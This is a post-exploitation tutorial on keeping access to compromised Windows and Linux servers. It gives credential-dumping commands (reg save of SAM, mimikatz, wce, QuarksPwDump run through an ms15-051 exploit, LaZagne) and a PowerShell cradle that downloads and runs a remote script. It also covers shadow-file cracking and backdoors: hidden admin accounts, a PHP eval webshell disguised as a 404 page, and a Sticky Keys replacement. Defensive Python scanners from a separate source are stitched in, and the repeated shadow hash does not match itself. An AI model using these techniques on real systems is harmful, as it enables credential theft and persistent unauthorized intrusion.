Intranet penetration – privilege maintenance (obtaining Windows and Linux passwords, installing backdoors)
Introduction
When an attacker acquires server privileges, he usually uses some backdoor technique to keep the access he has obtained; once a backdoor has been implanted on the server, it is much easier for the attacker to get in the next time.
Objective
Since the attack may be discovered, and the webshell obtained earlier may be removed once it is found, the target would be lost. It is therefore necessary to leave a backdoor that maintains privileges, so that control is continuous.
Obtaining the system login account password
Windows: obtaining the system login account password
Windows system account password storage location:
C:\Windows\System32\config\SAM
Windows password verification principle: Windows manages user accounts with the SAM (Security Account Manager) mechanism. User accounts and passwords are hashed and stored in the SAM database, which lives in the file C:\Windows\System32\config\SAM. When a user logs in, the supplied credentials are first compared with the account information stored in the SAM file, and only then is it decided whether the user may log in. The system protects the SAM file: while the system is running it cannot be copied, deleted or read directly.
SAM file hash formats:
1. LM hash: systems up to and including Windows 2003
2. NTLM hash: systems after Windows 2003
Both LM and NTLM are hash-based, but their security mechanisms and strength differ, and the LM password hash is comparatively weak. Although few people still use old Windows 2000-era systems, by default, to preserve backward compatibility, the user password is hashed separately with each scheme and both values are stored in the SAM database.
LM hash: the password is at most 14 characters; if it is shorter than 14, the missing part is padded with zeros; all characters are converted to upper case; the result is split into two groups of 7 bytes, each group is encrypted, and the two results are concatenated to give the final LM hash. Its essence is DES encryption.
NTLM hash: the user password is first converted to Unicode encoding and then hashed with the standard MD4 one-way hash.
LM hashing is far less secure than NTLM because NTLM allows longer passwords, preserves case differences, and does not split the password into smaller, more easily cracked blocks. In a pure NTLM environment, LAN Manager hashing should therefore be turned off.
Getting the contents of the SAM file:
Methods of obtaining the SAM hashes:
1. Tools (typically flagged by antivirus): wce.exe, QuarksPwDump.exe, Pwdump7.exe, gethash.exe, mimikatz
2. Methods that avoid antivirus detection:
2.1 Export the hashes through the registry with the commands:
reg save hklm\sam C:\hash\sam.hive
reg save hklm\system C:\hash\system.hive
Then download the exported files and use Pwdump7 to extract the hashes.
2.2 Export a shadow copy of the SAM file (generally used on domain controllers with tens of thousands of users).
2.3 Other methods: procdump (or lsadump) together with mimikatz; PowerShell mimikatz; PowerShell sgetpasshash; PowerShell smh.com.au
Cracking the passwords
1. Online cracking: http://www.objectif-securite.ch/en/ophcrack.php, http://cmd5.com, https://somd5.com
2. Local cracking (brute force): LM hashes: Cain; NTLM hashes: ophcrack with rainbow tables (rainbow table download: http://ophcrack.source.net/tables.php)
Notes
1. LM can only store the hash of a password of at most 14 characters. If the password is longer than 14 characters, Windows automatically hashes it with NTLM only, so only the corresponding NTLM hash is available and the LM password field is displayed as all zeros.
2. In general, the hashes exported by these tools contain both an LM and an NTLM value; that is, if the password is at most 14 characters, LM also has a value. Apart from an LM value of all zeros, on older systems an LM value beginning with aad3b435b51404eeaad3b435b51404ee indicates that the password is empty or longer than 14 characters.
3. Systems up to and including Windows 2003 enable LM hashing by default; systems after Windows 2003 disable LM hashing and use NTLM.
4. An LM hash always has a corresponding NTLM hash value.
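The notes above describe what the LM and NT fields of an exported hash list reveal. As an added example (not code from the original page), the following Python audits a pwdump-style export (user:RID:LM:NT:::) and flags accounts that still store a real LM hash (LM hashing enabled and password of 14 characters or fewer) and accounts whose NT hash is that of the empty password; the sample lines are constructed, only the two well-known constants are real.

```python
# Added example (not from the original page): audit a pwdump-style export
# (user:RID:LM_hash:NT_hash:::) for the conditions described in the notes.
# The sample export is constructed; only EMPTY_LM and EMPTY_NT are real values.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM value for empty, >14-char or LM-disabled
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT (MD4 of UTF-16LE) hash of ""
ZERO_LM = "0" * 32                             # some tools print all zeros instead

SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
legacy:1001:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
svc:1002:00000000000000000000000000000000:fedcba9876543210fedcba9876543210:::
"""

def parse_pwdump(text):
    """Return (user, rid, lm, nt) tuples; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue  # not a 16-byte hash in hex
        rows.append((user, rid, lm, nt))
    return rows

def audit(text):
    """Map each user to a list of findings (an empty list means nothing flagged)."""
    findings = {}
    for user, rid, lm, nt in parse_pwdump(text):
        issues = []
        if lm not in (EMPTY_LM, ZERO_LM):
            issues.append("LM hash stored: password <= 14 chars and LM hashing enabled")
        if nt == EMPTY_NT:
            issues.append("empty password")
        findings[user] = issues
    return findings

if __name__ == "__main__":
    for user, issues in audit(SAMPLE_DUMP).items():
        print(user, "OK" if not issues else "; ".join(issues))
```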
QuarksPwDump.exe
1. Export the local hash values with QuarksPwDump.exe: upload QuarksPwDump.exe to C:\Windows\Temp on the target machine
2. After escalating privileges with ms15-051x64.exe (exploit), enter the following command in the virtual terminal of the China Chopper (caidao) webshell client:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"
3. AFFFEBA176210FAD4628F0524BFE1942 is the password hash; submit it to cmd5 to crack it
mimikatz
Note: only the passwords of currently logged-in users can be retrieved
Principle of using mimikatz to retrieve clear-text passwords and hashes
mimikatz obtains the password information directly from the lsass.exe process. This is not brute-force cracking but a direct reverse calculation according to the algorithm used by lsass.exe. lsass.exe is the system process of the Local Security Authority service.
1. Use the China Chopper client to upload mimikatz to C:\Windows\Temp on the target machine
2. After escalating privileges with ms15-051x64.exe (exploit), enter the following command in the virtual terminal of the China Chopper client:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"
wce.exe
1. Upload wce.exe to C:\Windows\Temp on the target machine
2. On the target machine, enter:
wce.exe -l    list passwords and credentials
wce.exe -lv   read the passwords of the SAM file
PowerShell script
PowerShell is a command line that ships with Windows; it acts as an enhanced command line, extends many scripts, and most Windows and Linux commands are available in it.
The Invoke-WCMDump extension script obtains hashes (a PowerShell script for exporting Windows credentials from Credential Manager)
1. Upload the script and use it
Change the execution policy so that scripts can be loaded:
Set-ExecutionPolicy unrestricted
Load the Invoke-WCMDump script:
Import-Module .\Invoke-WCMDump.ps1
Then enter the script name Invoke-WCMDump to run it directly
2. Use it without uploading the script
Load it remotely straight from the command line (the address is a reachable download address for the script):
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.106/Invoke-WCMDump.ps1');Invoke-WCMDump"
LaZagne
LaZagne is an open-source application for retrieving large numbers of passwords stored on the local computer. Because each piece of software stores passwords differently (clear text, APIs, custom algorithms, databases, etc.), the tool uses a variety of methods to obtain them.
1. In cmd, enter lazagne.exe -h to view the instructions
2. Extract the hashes (all runs every module; to extract a specific module, give that module's name instead)
lazagne.exe all
Linux/Unix: obtaining the system login account password
System account password storage location:
Passwords: /etc/shadow; accounts: /etc/passwd
/etc/shadow example: root:$6$Rw99zZ2B$AZwfboPWM6z2tiBeK.EL74sivucCa8YhCrGCBoVdeYUUGsf8iwNx.wTLDjI5poygaGadAWt/gewQKO7jT/:17564:0:999:7:7:7:7:7
The password is the second colon-separated field: $6$Rw99zZ2B$AZwfboPW6z2tiBeK.EL74sivucCa8YhCrXGCBoVdeDEYUYUGsf8iwNxJkr.wTLDjI5poygaLaCalWtWW/GewQ kO7jT/
The first $ introduces the hashing method, the second $ the salt, and the third $ the hashed password. When the first field is $1$, MD5 is used; when it is $5$, SHA-256; when it is $6$, SHA-512.
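The $id$salt$hash layout just described can be parsed mechanically. The following Python is an added example (not from the original page): it splits /etc/shadow records, names the algorithm from the id, and flags locked, passwordless and MD5-hashed accounts; the sample records are constructed and the hash strings are placeholders, not real hashes.

```python
# Added example (not from the original page): parse /etc/shadow records and
# classify each password field by the $id$salt$hash layout described above.
# Sample records are constructed; "PLACEHOLDERHASH" stands in for a real hash.
import re

ALGORITHMS = {"1": "MD5", "5": "SHA-256", "6": "SHA-512"}  # ids named on the page
WEAK = {"MD5"}  # md5-crypt is too fast for modern hardware and is treated as weak

SAMPLE_SHADOW = """\
root:$6$Rw99zZ2B$PLACEHOLDERHASH:17564:0:99999:7:::
legacy:$1$abcdefgh$PLACEHOLDERHASH:17000:0:99999:7:::
daemon:*:17564:0:99999:7:::
locked:!$6$saltsalt$PLACEHOLDERHASH:17564:0:99999:7:::
nopass::17564:0:99999:7:::
"""

# $<id>$<salt>$<hash>; a "rounds=N$" prefix before the salt is not handled here
_CRYPT = re.compile(r"^\$(?P<id>[0-9a-z]+)\$(?P<salt>[^$]*)\$(?P<hash>.*)$")

def classify_password_field(field):
    """Describe one shadow password field: state, algorithm name and salt."""
    if field == "":
        return {"state": "no password set", "algorithm": None, "salt": None}
    if field.startswith(("!", "*")):
        return {"state": "locked", "algorithm": None, "salt": None}
    m = _CRYPT.match(field)
    if not m:
        return {"state": "unknown format", "algorithm": None, "salt": None}
    algo = ALGORITHMS.get(m.group("id"), "id " + m.group("id"))
    state = "weak hash" if algo in WEAK else "hashed"
    return {"state": state, "algorithm": algo, "salt": m.group("salt")}

def parse_shadow(text):
    """Map each user name to the classification of its password field."""
    result = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) < 2:
            continue  # not a shadow record
        result[fields[0]] = classify_password_field(fields[1])
    return result

if __name__ == "__main__":
    for user, info in parse_shadow(SAMPLE_SHADOW).items():
        print(f"{user}: {info}")
```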
Cracking the passwords with John the Ripper:
1. Crack directly with the default dictionary
Enter on the command line:
john --single /etc/shadow
Then run cat .john/john.pot to view the recovered passwords
2. Crack with your own dictionary
Create a new dictionary file and write the candidate passwords into it
Enter the following command:
john --wordlist=list /etc/shadow
Installing the backdoor
Objective
After acquiring server privileges, an attacker usually uses some backdoor technique to maintain them; once a backdoor has been implanted on the server, the attacker is in no man's land.
Common backdoor techniques
Hidden and cloned accounts, hidden webshells, shift backdoor, startup items, scheduled tasks, DLL hijacking, PowerShell backdoors, remote control software
Here is how a few of these work
1. Hidden and cloned accounts
Principle
When you create a user and append $ to the name, the user becomes a hidden user
Process: create a user whose name ends in $, such as za$; when you list the users, this user does not appear
Add the za$ user to the administrators group
za$ can then log in, and it has administrator rights
2. Using a 404 page to hide a webshell (a 403 page works on the same principle)
First copy the source code of the 404 error page.
Then create a new file 1.php in the website directory, paste the source code above into it, change the path in the message to the name of our new file, and append a one-line PHP webshell below it:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /1.php was not found on this server.</p>
</body></html>
<?php @eval($_REQUEST[666])?>
Visiting 1.php gives the impression that the file does not exist
Then connect to it with the China Chopper client.
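A file built this way has a recognisable shape: an HTML error page followed by a PHP tag that hands request input to eval. The following Python is an added example (not from the original page) written from the defender's side: it walks a web root and reports .php files matching that pattern; the sample file contents are constructed and written to a temporary directory.

```python
# Added example (not from the original page): find PHP files that disguise an
# eval-on-request one-liner behind a 404/403 error page body.
# The sample contents are constructed for this example.
import os
import re
import tempfile

_HTML_ERROR = re.compile(r"<title>\s*(404|403)\s+[^<]*</title>", re.IGNORECASE)
_EVAL_REQ = re.compile(
    r"<\?php\s*@?(eval|assert)\s*\(\s*\$_(REQUEST|POST|GET)\s*\[", re.IGNORECASE)

def classify_php_source(source):
    """Return the list of indicators found in one file's text (empty = clean)."""
    indicators = []
    if _EVAL_REQ.search(source):
        indicators.append("eval/assert on request parameter")
        if _HTML_ERROR.search(source):
            indicators.append("disguised as error page")
    return indicators

def scan_webroot(root):
    """Walk a directory and map each suspicious .php path to its indicators."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as f:
                found = classify_php_source(f.read())
            if found:
                hits[os.path.relpath(path, root)] = found
    return hits

SAMPLE_SHELL = ('<html><head><title>404 Not Found</title></head><body>'
                '<h1>Not Found</h1></body></html>\n<?php @eval($_REQUEST[666])?>')
SAMPLE_CLEAN = '<?php echo "hello"; ?>'

def demo():
    """Write the constructed samples to a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "1.php"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_SHELL)
        with open(os.path.join(root, "index.php"), "w", encoding="utf-8") as f:
            f.write(SAMPLE_CLEAN)
        return scan_webroot(root)

if __name__ == "__main__":
    print(demo())
```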
3. Windows Shift Backdoor
Principle:
Rename cmd.exe so that it overwrites the original Sticky Keys program. When Sticky Keys is triggered again, it is equivalent to running cmd.exe
sethc.exe location:
Windows/System32/sethc.exe
Process:
Rename cmd.exe and replace the Sticky Keys program (sethc.exe) with it, so that after connecting to the server via Remote Desktop, pressing Shift five times pops up a cmd command line with SYSTEM privileges.
4. DLL hijacking for privilege escalation
Example of the DLL hijacking principle:
For example, suppose the KuGou music player is installed, and when it plays music it must call a dynamic link library of the Windows system, mp3play.dll. The hacker develops a malicious mp3play.dll, finds an MP3 song, puts the malicious DLL and the song in the same folder, packs them into an archive and sends it to the victim.
If the victim right-clicks to extract the MP3 file and the DLL file from this archive into the same directory (90% of people will do so), then when the victim opens the MP3 file, KuGou first looks for mp3play.dll to load. Because the DLL loading order designed by Microsoft starts with the directory of the file itself, the fake, malicious mp3play.dll is loaded first.
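The replacement described above leaves sethc.exe with exactly the content of cmd.exe, which is easy to check. The following Python is an added example (not from the original page) from the defender's side: it hashes both binaries in a System32 directory and reports whether sethc.exe has been replaced; the directory is a parameter so it can be run against a mounted image or, as in demo(), a constructed temporary folder.

```python
# Added example (not from the original page): detect the Sticky Keys backdoor
# by comparing the content hash of sethc.exe with that of cmd.exe.
import hashlib
import os
import tempfile

def sha256_of(path):
    """Return the SHA-256 hex digest of a file, or None if it is missing."""
    if not os.path.isfile(path):
        return None
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def check_sethc(system32_dir):
    """Compare sethc.exe with cmd.exe; identical content means it was replaced."""
    sethc = sha256_of(os.path.join(system32_dir, "sethc.exe"))
    cmd = sha256_of(os.path.join(system32_dir, "cmd.exe"))
    if sethc is None or cmd is None:
        status = "missing"          # cannot judge without both files
    elif sethc == cmd:
        status = "replaced"
    else:
        status = "ok"
    return {"status": status, "sethc": sethc, "cmd": cmd}

def demo():
    """Exercise the check on a constructed temp directory (fake file contents)."""
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "cmd.exe"), "wb") as f:
            f.write(b"fake cmd bytes")
        with open(os.path.join(d, "sethc.exe"), "wb") as f:
            f.write(b"fake cmd bytes")      # identical to cmd.exe: backdoor pattern
        replaced = check_sethc(d)["status"]
        with open(os.path.join(d, "sethc.exe"), "wb") as f:
            f.write(b"fake sethc bytes")    # different content: normal
        return replaced, check_sethc(d)["status"]

if __name__ == "__main__":
    print(demo())
    print(check_sethc(r"C:\Windows\System32"))
```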